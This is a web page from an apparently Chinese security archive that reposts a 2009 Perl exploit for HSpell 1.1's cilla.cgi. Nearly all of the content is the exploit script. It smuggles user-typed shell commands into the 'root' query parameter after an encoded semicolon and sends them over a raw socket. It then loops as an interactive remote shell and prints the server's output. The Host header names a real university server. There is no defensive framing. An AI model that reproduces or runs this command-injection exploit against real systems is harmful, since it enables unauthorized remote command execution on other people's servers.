首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
>HSPell 1.1 (cilla.cgi) Remote Command Execution Exploit
来源:http://dusecurity.com/ 作者:ZeN 发布时间:2009-01-14  
#!/usr/bin/perl
use IO::Socket;

print q{

HSpell v1.1 Command Execution Exploit

Theres a 1000 ways to improve this exploit,
but I really couldn't be fucked with it.

Made By ZeN
http://dusecurity.com/
http://darkcode.me/

};


$host = 'site.com';
$port = '80';
$path = '/cgi-bin/cilla.cgi';

ShellMe:

print "\nh4x0r~> ";
$cmd = <stdin>;
chop ($cmd);

$cmd =~ s/\ /+/g;


$header = "GET ".$path."?root=pwnt%3B+".$cmd."&binyan=%F7%EC HTTP/1.1\r\n";
$header = $header."Host: wassist.cs.technion.ac.il\r\n";
$header = $header."User-Agent: DUSecurity Group\r\n";
$header = $header."Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
$header = $header."Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$header = $header."Accept-Encoding: gzip,deflate\r\n";
$header = $header."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$header = $header."Connection: close\r\n";
$header = $header."Cache-Control: max-age=0\r\n";
$header = $header."\r\n";


$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || print "[*] Error!\n";
print $get1 $header;
$get1->recv($buffer,50000);

$shell = substr($buffer, 1347);

print $shell;

goto ShellMe;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·>HSPell 1.1 (cilla.cgi) Remote
·PowerPoint Viewer OCX 3.1 Remo
·dBpowerAMP Audio Player 2 .PLS
·Nofeel FTP Server 3.6 (CWD) Re
·PowerPoint Viewer OCX 3.1 Remo
·Word Viewer OCX 3.2 Remote Fil
·Office Viewer ActiveX Control
·Ciansoft PDFBuilderX version 2
·Office Viewer ActiveX Control
·Denial of service exploit that
·Word Viewer OCX 3.2 ActiveX (S
·TeamSpeak <= 2.0.23.17 Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved